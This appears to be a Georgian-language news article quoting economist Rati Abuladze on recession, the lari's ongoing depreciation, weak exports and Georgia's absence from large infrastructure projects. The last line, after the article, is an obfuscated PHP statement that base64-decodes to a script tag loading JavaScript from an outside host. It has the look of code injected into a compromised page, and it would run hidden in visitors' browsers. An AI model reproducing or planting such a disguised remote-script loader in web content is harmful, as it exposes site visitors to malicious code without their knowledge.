celsiusi
ავერსი შნაიდერი
ეკონომიკის დოქტორი, პროფესორი რატი აბულძის განცხადბით, რეცესია და კრიზისი ყოველდღიურად აზანზარებს ბაზარს, რაც ბაზრის დამშვიდების შესაძლებლობას არ იძლევა. 
 
როგორც რატი აბულაძემ საინფორმაციო სააგენთო “BUSINESS TIME”-ს განუცხადა, ქვეყანა ვერ ახდენს ექსპორტის შესაძლებლობების ზრდას, ვერ ქმნის მეგა პროექტებს, ვერ იწვევს ბაზრისა და საზოგადოების ეკონომიკურ გააქტიურებას. შემოსავლების წარმოქმნის გარეშე კი ვერც ეროვნული ვალუტა ინარჩუნებს მყარ პოზიციას და არც ლარის გაუფასურების ზეწოლის კომპენსირებას აქვს ადგილი. საგარეო ვალებისა და  ფულის ხარჯვის მადის ზრდით კი გრძელვადიანი პერსპექტივაა რისკებიც და ვალის მართვაც.   
 
“ბაზარი, რომელიც შემოსავლების ზრდაზე უნდა იყოს ორიენტირებული, საერთოდ შემოსავლებს ვერ „ხედავს“. „პოლიტიკური მოქმედებების“ დეფიციტის ფონზე, ბიზნესი გლობალური ბაზრების ოპტიმიზმით უფროა განმსჭვალული, ვიდრე ადგილობრივი ბაზრის.
 
აღსანიშნია, რომ წვრილ-წვრილი ეკონომიკური ღონისძიებებით და მცირე მასშტაბის პროგრამული აქტივობით, ქვეყანა მსხვილ პრობლემებს ვერ გადაჭრის. შესაბამისად, ვერ დაძლევს ვერც სავალუტო და ვერც სოციალურ-ეკონომიკურ პრობლემებს. ვერც დავიკმაყოფილებთ გეოეკონომიკურ ინტერესებს და არც ეკონომიკის აღდგენის სიჩქარე იქნება დიდი“, - განუცხადა აბულაძემ “BUSINESS TIME”-ს.
 
მისივე თქმით, სამწუხაროდ, დღეს, ქვეყანა ჩართული არ არის მეგაპროექტებსა და მსხვილი ინფრასტრუქტურის შექმნის საერთაშორისო მარათონში. პოლიტიკური გარემო ვერ ეხმარება ქართველ ბიზნესმენებს იმისათვის, რომ მათ სხვა ქვეყნებში, მსხვილ ინფრასტრუქტურულ პროექტებში მიიღონ  მონაწილეობა. სწორედ მეგა პროექტები ემსახურება ფულად გადმორიცხვების, შემოსავლების, ბიზნესის ავტორიტეტის, სახელმწიფო და პოლიტიკური იმიჯის ზრდას.
 
“საქართველო კარგ “სტატუს კვოში“ არ იმყოფება სავაჭრო და საინვესტიციო აქტივობის მიმართულებით, რაც (საგარეო ვაჭრობა და ინვესტიციები) „პოლიტიკური აქტივობისა“ და სახელმწიფო ინტერესების გამოხატულებაა. არ ვართ არც ეკონომიკური და არც პოლიტიკური ცენტრი. ასეთ მოცემულობის გამო, ეროვნული ვალუტა  მყარ პოზიციას ვერ შეინარჩუნებს მხოლოდ საქართველოს ეროვნული ბანკის ხელთ არსებული მარეგულირებელი და მონეტარული ინსტრუმენტებით. ამასთან, სავალუტო ბაზარზე გატარებული ღონისძიებები კი ვალუტის გაუფასურების შემგუებლობის ღონისძიებებად იქცა. პრაქტიკულად, ლარი მხოლოდ გაუფასურების ისტორიას ქმნის. თუმცა ეს ღონისძიებებიც, რომ არ განეხორციელებინათ, ლარის „მოკვდავობა“ დამტკიცდებოდა.”- განმარტა ეკონომიკის დოქტორმა რატი აბულაძემ. 
 
 
1492
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");